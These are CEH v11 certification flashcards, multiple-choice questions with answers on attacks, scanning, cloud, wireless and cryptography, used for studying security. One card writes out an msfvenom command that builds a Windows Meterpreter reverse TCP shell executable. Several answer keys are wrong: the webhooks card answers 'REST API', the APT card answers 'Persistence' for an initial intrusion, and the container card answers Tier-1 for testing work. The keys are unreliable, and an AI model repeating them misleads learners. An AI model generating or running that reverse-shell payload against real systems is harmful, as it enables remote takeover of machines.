CEH v11 Q1 Flashcards
- Which of the following web vulnerabilities would an attacker be attempting to exploit if they delivered the following
input? ‘ ] > ‘
SQLi
XXS
IDOR
XXE
XXE
- Which Nmap switch helps evade IDS or firewalls?
- n/-R
- D
- oN/-oX/-oG
- T
-D
- Which of the following types of SQL injection attacks extends the results returned by the original query, enabling
attackers to run two or more statements if they have the same structure as the original one?
Error-based injection
Boolean-based blind SQL injection
Union SQL injection
Blind SQL injection
Union SQL injection
- Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and
location tags of recently visited places. Realizing this, James, a professional hacker, targets Emily and her
acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers
information to perform other sophisticated attacks.
What is the tool employed by James in the above scenario?
VisualRoute
Hootsuite
Ophcrack
HULK
Hootsuite
- Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies,
such as libraries and configuration files, binaries, and other resources that run independently from other processes
in the cloud environment. For the containerization of applications, he follows the five-tier container technology
architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the
registries.
Which of the following tiers of the container technology architecture is Abel currently working in?
Tier-2: Testing and accreditation systems
Tier-3: Registries
Tier-1: Developer machines
Tier-4: Orchestrators
Tier-1: Developer machines
- During the enumeration phase, Lawrence performs banner grabbing to obtain information such as OS details and
versions of services running. The service that he enumerated runs directly on TCP port 445.
Which of the following services is enumerated by Lawrence in this scenario?
Telnet
Server Message Block (SMB)
Remote procedure call (RPC)
Network File System (NFS)
Server Message Block (SMB)
- What is the correct way of using MSFvenom to generate a reverse TCP shellcode for Windows?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444-f c
msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
- Keatron performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active
systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the
network.
What is the type of vulnerability assessment did Keatron perform on the target organization?
Credentialed assessment
Passive assessment
Internal assessment
External assessment
Passive assessment
- Bobby targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network
using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these
techniques, he successfully deployed malware on the target system to establish an outbound connection. What APT lifecycle
phase is currently executing?
Cleanup
Preparation
Initial intrusion
Persistence
Persistence
- At what stage of the cyber kill chain theory model does data exfiltration occur?
Weaponization
Actions on objectives
Command and control
Installation
Actions on objectives ✓
- Jason, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and
passwords are shared in plaintext, making the way for hackers to perform successful session hijacking. To address this situation,
Jason implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by
Jason?
IP
FTPS
FTP
HTTPS
HTTPS ✓
- This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive
data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve.
Which is this wireless security protocol?
WPA2-Enterprise
WPA3-Personal
WPA2-Personal
WPA3-Enterprise
WPA3-Enterprise ✓
- What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android
application?
APK.info
classes.dex
resources.asrc
AndroidManifest.xml
AndroidManifest.xml ✓
- You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site
but only want results that show file extensions.
What Google dork operator would you use?
inurl
filetype
ext
site
filetype ✓
- Alice, a professional hacker, targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending
spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud
service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored
them in the MSP. Then, she used this information to launch further attacks on the target organization.
Which of the following cloud attacks did Alice perform in the above scenario?
Cloudborne attack
Cloud hopper attack
Cloud cryptojacking
Man-in-the-cloud (MITC) attack
Cloud hopper attack ✓
- Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she
uses a user-defined HTTP callback or push APIs that are raised based on trigger events; when invoked, this feature supplies data
to other applications so that users can instantly receive real-time information.
Which of the following techniques is employed by Susan?
Webhooks
REST API
Web shells
SOAP API
REST API ✓
- In this form of encryption algorithm, every individual block contains 64-bit data, and three keys are used, where each key
consists of 56 bits. Which is this encryption algorithm?
Triple Data Encryption Standard
MD5 encryption algorithm
IDEA
AES
Triple Data Encryption Standard ✓
- Richard, an attacker, targets an MNC. In this process, he uses a footprinting technique to gather as much information as
possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry
date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with
social engineering to obtain internal details of its network.
What type of footprinting technique is employed by Richard?
VoIP footprinting
Email footprinting
Whois footprinting
VPN footprinting
Whois footprinting ✓
- An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but
redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?
Spoofing
Vishing
Phishing
DDoS
Phishing ✓
- Robin, a professional hacker, targeted an organization’s network to sniff all the traffic. During this process, Robin plugged in a
rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root
bridge that will later allow him to sniff all the traffic in the network.
What is the attack performed by Robin in the above scenario?
STP attack
ARP spoofing attack
VLAN hopping attack
DNS poisoning attack
STP attack ✓
- Bobby, an attacker, targeted a user and decided to hijack and intercept all their wireless communications. He
installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used this virtual
tower to interrupt the data transmission between the user and real tower, attempting to hijack an active session.
Upon receiving the user’s request, Bobby manipulated the traffic with the virtual tower and redirected the victim to a
malicious website.
What is the attack performed by Bobby in the above scenario?
KRACK attack
Wardriving
Jamming signal attack
aLTEr attack
aLTEr attack ✓
- Dorian is sending a digitally signed email to Polly. With which key is Dorian signing this message and how is Poly validating it?
Dorian is signing the message with Poly’s private key, and Poly will verify that the message came from Dorian by using
Dorian’s public key.
Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian’s
private key.
Dorian is signing the message with Poly’s public key, and Poly will verify that the message came from Dorian by using
Dorian’s public key.
Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by
using Dorian’s public key.
Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by
using Dorian’s public key.
- Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application
she is working on. She utilizes a component that can process API requests and handle various Docker objects, such
as containers, volumes, images, and networks.
What is the component of the Docker architecture used by Annie in the above scenario?
Docker client
Docker daemon
Docker object
Docker registries
Docker daemon ✓
- What is the common name for a vulnerability disclosure program opened by companies in platforms such as
HackerOne?
Bug bounty program
White-hat hacking program
Vulnerability hunting program
Ethical hacking program
Bug bounty program ✓